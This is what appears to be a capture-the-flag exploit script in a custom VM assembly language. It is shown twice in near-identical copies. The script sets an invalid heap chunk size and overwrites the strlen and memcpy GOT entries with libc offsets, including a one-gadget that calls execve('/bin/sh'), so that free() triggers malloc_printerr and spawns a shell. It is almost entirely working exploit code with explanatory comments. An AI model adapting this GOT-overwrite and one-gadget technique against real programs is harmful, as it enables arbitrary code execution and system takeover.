xf1les/exp.vm Secret

## exp.vm
# Overwrite chunk size to an invaild value
mov eax, 2097156
sub esp, eax
mov eax, 0
push eax

# Overwrite strlen GOT entry to $libc+0xEEC55
#.text:00000000000EEC55                 mov     rsi, r12
#.text:00000000000EEC58                 mov     rdi, r13
#.text:00000000000EEC5B                 mov     rdx, r14
#.text:00000000000EEC5E                 call    j_mempcpy
mov eax, 69324792
add esp, eax
mov eax, 152
add esp, eax # esp = $libc+0x219098
mov eax, 800203
pop ebx
sub ebx, eax
push ebx

# Overwrite memcpy GOT entry to one gadget ($libc+0xebcf8)
#0xebcf8 execve("/bin/sh", rsi, rdx)
#constraints:
#  address rbp-0x78 is writable
#  [rsi] == NULL || rsi == NULL
#  [rdx] == NULL || rdx == NULL
mov eax, 88
sub esp, eax # esp = $libc+0x219040
mov eax, 799240
pop ebx
sub ebx, eax
push ebx

# Then, due to the invaild chunk size, free() will call malloc_printerr(),
#  which will later call j_strlen() to set rsi, rdx as zero and trigger the one gadget
	# Overwrite chunk size to an invaild value
	mov eax, 2097156
	sub esp, eax
	mov eax, 0
	push eax

	# Overwrite strlen GOT entry to $libc+0xEEC55
	#.text:00000000000EEC55 mov rsi, r12
	#.text:00000000000EEC58 mov rdi, r13
	#.text:00000000000EEC5B mov rdx, r14
	#.text:00000000000EEC5E call j_mempcpy
	mov eax, 69324792
	add esp, eax
	mov eax, 152
	add esp, eax # esp = $libc+0x219098
	mov eax, 800203
	pop ebx
	sub ebx, eax
	push ebx

	# Overwrite memcpy GOT entry to one gadget ($libc+0xebcf8)
	#0xebcf8 execve("/bin/sh", rsi, rdx)
	#constraints:
	# address rbp-0x78 is writable
	# [rsi] == NULL \|\| rsi == NULL
	# [rdx] == NULL \|\| rdx == NULL
	mov eax, 88
	sub esp, eax # esp = $libc+0x219040
	mov eax, 799240
	pop ebx
	sub ebx, eax
	push ebx

	# Then, due to the invaild chunk size, free() will call malloc_printerr(),
	# which will later call j_strlen() to set rsi, rdx as zero and trigger the one gadget